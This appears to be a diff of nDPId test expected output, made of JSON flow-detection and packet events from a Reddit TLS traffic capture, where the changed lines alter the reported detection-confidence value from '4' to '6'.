-01282{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":502,"source":"reddit.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1605291686035,"flow_last_seen":1605291686128,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":366,"midstream":0,"thread_ts_msec":1605291686128,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56568,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.redditstatic.com","server_names":"www.redditstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Reddit Inc., CN=www.redditstatic.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"24:BA:A2:05:04:98:6C:4E:72:57:0C:2C:45:25:9D:1F:8E:C3:CC:A8"}} -01282{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":508,"source":"reddit.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1605291686035,"flow_last_seen":1605291686128,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":366,"midstream":0,"thread_ts_msec":1605291686128,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56570,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.redditstatic.com","server_names":"www.redditstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Reddit Inc., CN=www.redditstatic.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"24:BA:A2:05:04:98:6C:4E:72:57:0C:2C:45:25:9D:1F:8E:C3:CC:A8"}} -01007{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":510,"source":"reddit.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1605291686035,"flow_last_seen":1605291686128,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":223,"midstream":0,"thread_ts_msec":1605291686128,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56566,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.redditstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01282{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":516,"source":"reddit.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1605291686035,"flow_last_seen":1605291686129,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":366,"midstream":0,"thread_ts_msec":1605291686129,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56566,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.redditstatic.com","server_names":"www.redditstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Reddit Inc., CN=www.redditstatic.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"24:BA:A2:05:04:98:6C:4E:72:57:0C:2C:45:25:9D:1F:8E:C3:CC:A8"}} +00947{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":468,"source":"reddit.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291686064,"flow_last_seen":1605291686103,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291686103,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56588,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"preview.redd.it","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01007{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":470,"source":"reddit.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291686035,"flow_last_seen":1605291686105,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":260,"midstream":0,"thread_ts_msec":1605291686105,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56564,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.redditstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01282{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":475,"source":"reddit.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1605291686035,"flow_last_seen":1605291686106,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":366,"midstream":0,"thread_ts_msec":1605291686106,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56564,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.redditstatic.com","server_names":"www.redditstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Reddit Inc., CN=www.redditstatic.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"24:BA:A2:05:04:98:6C:4E:72:57:0C:2C:45:25:9D:1F:8E:C3:CC:A8"}} +01007{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":490,"source":"reddit.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1605291686035,"flow_last_seen":1605291686110,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":223,"midstream":0,"thread_ts_msec":1605291686110,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56562,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.redditstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01281{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":492,"source":"reddit.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1605291686035,"flow_last_seen":1605291686110,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":406,"midstream":0,"thread_ts_msec":1605291686110,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56562,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.redditstatic.com","server_names":"www.redditstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Reddit Inc., CN=www.redditstatic.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"24:BA:A2:05:04:98:6C:4E:72:57:0C:2C:45:25:9D:1F:8E:C3:CC:A8"}} +01007{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":498,"source":"reddit.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1605291686035,"flow_last_seen":1605291686127,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":223,"midstream":0,"thread_ts_msec":1605291686127,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56568,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.redditstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01007{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":501,"source":"reddit.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1605291686035,"flow_last_seen":1605291686128,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":223,"midstream":0,"thread_ts_msec":1605291686128,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56570,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.redditstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01282{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":502,"source":"reddit.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1605291686035,"flow_last_seen":1605291686128,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":366,"midstream":0,"thread_ts_msec":1605291686128,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56568,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.redditstatic.com","server_names":"www.redditstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Reddit Inc., CN=www.redditstatic.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"24:BA:A2:05:04:98:6C:4E:72:57:0C:2C:45:25:9D:1F:8E:C3:CC:A8"}} +01282{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":508,"source":"reddit.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1605291686035,"flow_last_seen":1605291686128,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":366,"midstream":0,"thread_ts_msec":1605291686128,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56570,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.redditstatic.com","server_names":"www.redditstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Reddit Inc., CN=www.redditstatic.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"24:BA:A2:05:04:98:6C:4E:72:57:0C:2C:45:25:9D:1F:8E:C3:CC:A8"}} +01007{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":510,"source":"reddit.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1605291686035,"flow_last_seen":1605291686128,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":223,"midstream":0,"thread_ts_msec":1605291686128,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56566,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.redditstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01282{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":516,"source":"reddit.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1605291686035,"flow_last_seen":1605291686129,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":366,"midstream":0,"thread_ts_msec":1605291686129,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56566,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.redditstatic.com","server_names":"www.redditstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Reddit Inc., CN=www.redditstatic.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"24:BA:A2:05:04:98:6C:4E:72:57:0C:2C:45:25:9D:1F:8E:C3:CC:A8"}} 00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":518,"source":"reddit.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":2,"flow_last_seen":1605291686129,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291686129,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAAJdleYwqAcsBIEmLB5kd7IUo3\/YpAbvdELkPzEPbiYGyoBJXgE4hAAACBAV4AQMDAwQCCArC1zjcqXTmGA=="} 00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":519,"source":"reddit.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1605291686129,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291686129,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAAJdleYwqAcsBIEmLB5kd7IUo3\/YpAbvdDvdaN0mUbYB0oBJXgO0tAAACBAV4AQMDAwQCCArC1zjbqXTmGA=="} -01008{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":521,"source":"reddit.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1605291686035,"flow_last_seen":1605291686129,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":223,"midstream":0,"thread_ts_msec":1605291686129,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56572,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.redditstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01008{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":521,"source":"reddit.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1605291686035,"flow_last_seen":1605291686129,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":223,"midstream":0,"thread_ts_msec":1605291686129,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56572,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.redditstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":524,"source":"reddit.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":3,"flow_last_seen":1605291686129,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291686129,"pkt":"qtsDr8lk5EKm5WPyht1gCcfOACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3RABu9uJgbK5D8xEgBAB+9IFAAABAQgKqXTmRcLXONw="} 00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":525,"source":"reddit.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":3,"flow_last_seen":1605291686129,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291686129,"pkt":"qtsDr8lk5EKm5WPyht1gBTHMACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3Q4Bu5RtgHT3WjdKgBAB+3ESAAABAQgKqXTmRcLXONs="} -00953{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":527,"source":"reddit.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291686084,"flow_last_seen":1605291686129,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291686129,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56592,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"emoji.redditmedia.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00953{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":528,"source":"reddit.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291686084,"flow_last_seen":1605291686130,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291686130,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56590,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"emoji.redditmedia.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01283{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":535,"source":"reddit.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1605291686035,"flow_last_seen":1605291686137,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":332,"midstream":0,"thread_ts_msec":1605291686137,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56572,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.redditstatic.com","server_names":"www.redditstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Reddit Inc., CN=www.redditstatic.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"24:BA:A2:05:04:98:6C:4E:72:57:0C:2C:45:25:9D:1F:8E:C3:CC:A8"}} -01010{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":541,"source":"reddit.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291686060,"flow_last_seen":1605291686137,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":260,"midstream":0,"thread_ts_msec":1605291686137,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56578,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"styles.redditmedia.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 